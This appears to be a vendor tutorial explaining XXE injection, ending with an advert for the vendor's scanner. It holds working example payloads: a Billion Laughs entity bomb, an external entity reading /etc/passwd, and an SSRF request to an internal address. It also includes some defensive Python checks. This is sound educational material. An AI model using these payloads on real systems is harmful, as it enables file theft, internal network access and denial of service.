What is an XML External Entity (XXE) Injection?

XML external entity (XXE) injection is one of the most common security vulnerabilities in web applications, APIs, and microservices. It allows hackers to interfere with an application’s processing of XML data. Although XXE is less well known than XSS or SQL injection, it appears in the OWASP Top 10 (2017) list of security risks.

By performing an XXE Injection, attackers can view files on the application server file system, or interact with any backend external systems that the application itself can access.

In some cases, hackers can even cause a Denial of Service (DoS), or escalate an XXE attack to compromise the underlying server or other backend infrastructure by leveraging the XXE vulnerability to perform a server-side request forgery (SSRF) attack. Below are examples that explain this in more detail.

Extensible Markup Language (XML) is a simple, very flexible data format. It is utilized everywhere from web services (SOAP, REST, XML-RPC) through documents (HTML, XML, DOCX) to image files (SVG, EXIF data). To interpret XML data, an application requires an XML parser (XML processor).

Here is an example output of a simple web application that accepts XML input, parses it and outputs the result:

REQUEST:

POST http://example.com/xxe HTTP/1.1
<test>
Hello Neuralegion
</test>

RESPONSE:

HTTP/1.0 200 OK
Hello Neuralegion

XML is used for much more than declaring elements, attributes, and text. An XML document can declare that it is of a specific type by referencing a type definition. A validating parser checks that the document conforms to that definition before the document is processed.

Two types of definitions can be used:

  1. An XML Schema Definition (XSD)
  2. A Document Type Definition (DTD)

XXE vulnerabilities usually arise from Document Type Definitions, which may be considered legacy but are still commonly used. DTDs are inherited from SGML (the ancestor of XML).

Below is an example of a DTD named test that declares an entity called security. This entity is an alias for the word “Neuralegion”. Accordingly, whenever &security; is used, the XML parser replaces that entity with the word “Neuralegion”.

REQUEST:

POST http://example.com/xxe HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ELEMENT test ANY>
<!ENTITY security "Neuralegion">
]>
<test>
Hello &security;
</test>

RESPONSE:

HTTP/1.0 200 OK
Hello Neuralegion
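
The same substitution can be reproduced locally. The following is a minimal sketch using Python's standard xml.etree.ElementTree module; the helper name parse_greeting is an assumption made for illustration, and the XML declaration is omitted because the document is passed as a Python string.

```python
import xml.etree.ElementTree as ET

# The request body from the example above, minus the XML declaration.
DOCUMENT = """<!DOCTYPE test [
<!ELEMENT test ANY>
<!ENTITY security "Neuralegion">
]>
<test>
Hello &security;
</test>"""


def parse_greeting(xml_text):
    """Parse the document and return the text of the root element."""
    root = ET.fromstring(xml_text)
    # The parser has already replaced &security; with its declared value.
    return root.text.strip()


print(parse_greeting(DOCUMENT))
```

Internal entities like this one are expanded by the underlying parser before the application sees the text, which is why the application code never has to handle &security; itself.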

By embedding XML entities within entities, hackers can cause a DoS. This attack is usually referred to as the Billion Laughs attack.

The result is an overload of the XML parser’s memory, although some XML parsers automatically limit the amount of memory they use.

REQUEST:

POST http://example.com/xxe HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ELEMENT test ANY>
<!ENTITY security "Neuralegion">
<!ENTITY temp_1 "&security;&security;">
<!ENTITY temp_2 "&temp_1;&temp_1;&temp_1;&temp_1;">
<!ENTITY temp_3 "&temp_2;&temp_2;&temp_2;&temp_2;&temp_2;">
]>
<test>
Hello &temp_3;
</test>

RESPONSE:

HTTP/1.0 200 OK
Hello Neuralegion
NeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegion
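
To see why nesting is so effective, it helps to compute the expanded size without actually running a parser. The sketch below is an illustration only: the function expanded_length and the ENTITY_REF pattern are hypothetical helpers, and the entity table mirrors the three nested levels from the request above. It assumes the entities are not recursive (XML forbids that).

```python
import re

# Matches general entity references such as &temp_1;
ENTITY_REF = re.compile(r"&([A-Za-z_][\w.-]*);")


def expanded_length(entities, name, cache=None):
    """Return how many characters the entity `name` expands to."""
    cache = {} if cache is None else cache
    if name not in cache:
        value = entities[name]
        # Characters that are not part of a nested reference.
        literal = len(ENTITY_REF.sub("", value))
        # Each nested reference contributes its own full expansion.
        nested = sum(
            expanded_length(entities, ref, cache)
            for ref in ENTITY_REF.findall(value)
        )
        cache[name] = literal + nested
    return cache[name]


entities = {
    "security": "Neuralegion",
    "temp_1": "&security;&security;",
    "temp_2": "&temp_1;&temp_1;&temp_1;&temp_1;",
    "temp_3": "&temp_2;&temp_2;&temp_2;&temp_2;&temp_2;",
}

print(expanded_length(entities, "temp_3"))  # 2 * 4 * 5 copies of 11 characters = 440
```

Each extra level multiplies the output size, so a payload of a few hundred bytes with more levels and more references per level can expand to gigabytes.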

Hackers can use XML entities for much more than just reducing the availability of an application, because XML entities don’t have to be defined in the XML document. In fact, XML entities can come from any source, including external sources (hence the name XML External Entity). This is when XXE becomes a type of Server-Side Request Forgery (SSRF) attack.

An attacker can create a request like the one in the example below by using a URI (in XML this is known as the system identifier). If the XML parser is configured to process external entities (many popular XML parsers have historically done so by default), the web server will return the contents of a file on its file system, potentially containing sensitive data.

REQUEST:

POST http://example.com/xxe HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ELEMENT test ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<test>
&xxe;
</test>

RESPONSE:

HTTP/1.0 200 OK
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...

Hackers are not limited to system files; they can also steal other local files, including source code, if they know the location and structure of the web application. With some XML parsers, it is even possible to list directories in addition to reading the contents of local resources. XXE attacks also commonly enable hackers to make regular HTTP requests to resources on the local network (that is, resources accessible only from behind the firewall).

REQUEST:

POST http://example.com/xxe HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ELEMENT test ANY>
<!ENTITY payload SYSTEM
"http://172.16.0.1/flag.txt">
]>
<test>
&payload;
</test>

RESPONSE:

HTTP/1.0 200 OK
Hello security researchers, I'm a flag on the server on the local network
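
When reviewing a suspicious payload, it can be useful to classify what a system identifier points at. The sketch below is one possible heuristic, not a complete defense: the function name targets_internal_resource and the sample address 192.168.1.10 are hypothetical, and DNS names are deliberately not resolved.

```python
import ipaddress
from urllib.parse import urlsplit


def targets_internal_resource(system_id):
    """Guess whether a system identifier points at a local or internal resource."""
    parts = urlsplit(system_id)
    if parts.scheme == "file":
        # Local file access, as in the /etc/passwd example.
        return True
    host = parts.hostname
    if host is None:
        return False
    if host == "localhost":
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name; resolving it is out of scope for this sketch.
        return False
    return address.is_private or address.is_loopback or address.is_link_local


print(targets_internal_resource("file:///etc/passwd"))            # True
print(targets_internal_resource("http://192.168.1.10/flag.txt"))  # True
print(targets_internal_resource("http://example.com/evil.dtd"))   # False
```

Because a hostname can resolve to an internal address, a check like this only narrows down what to investigate; disabling external entity processing in the parser remains the more reliable control.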


Parameter Entities

Besides general entities, XML also supports parameter entities, which are used only within DTDs. A “%” character before the entity name in the declaration tells the XML parser that a parameter entity is being defined.

In the example below, a parameter entity is used to define a general entity, which is ultimately referenced from the XML document. Building on this technique, a hacker can turn the theoretical CDATA example into a working attack by creating a malicious DTD hosted on attacker.com/evil.dtd.

REQUEST:

POST http://example.com/xxe HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ENTITY % param_entity
"<!ENTITY gen_entity 'NeuraLegion'>">
%param_entity;
]>
<test>
&gen_entity;
</test>

RESPONSE:

HTTP/1.0 200 OK
NeuraLegion


How Can XXE Vulnerabilities Be Detected?

XXE vulnerabilities appeared in the OWASP Top Ten for the first time in the 2017 edition, in fourth place on the list. The consequences are serious, and XXE should be treated and remediated as one of the highest security risks.

Luckily, testing your web application for XXE attacks as well as the other vulnerabilities is easy by using NeuraLegion’s NexDAST solution, which incorporates a specialized XXE scanner module. Contact us to learn more about running XXE scans on your web application, and please ask any questions that you have regarding our solutions.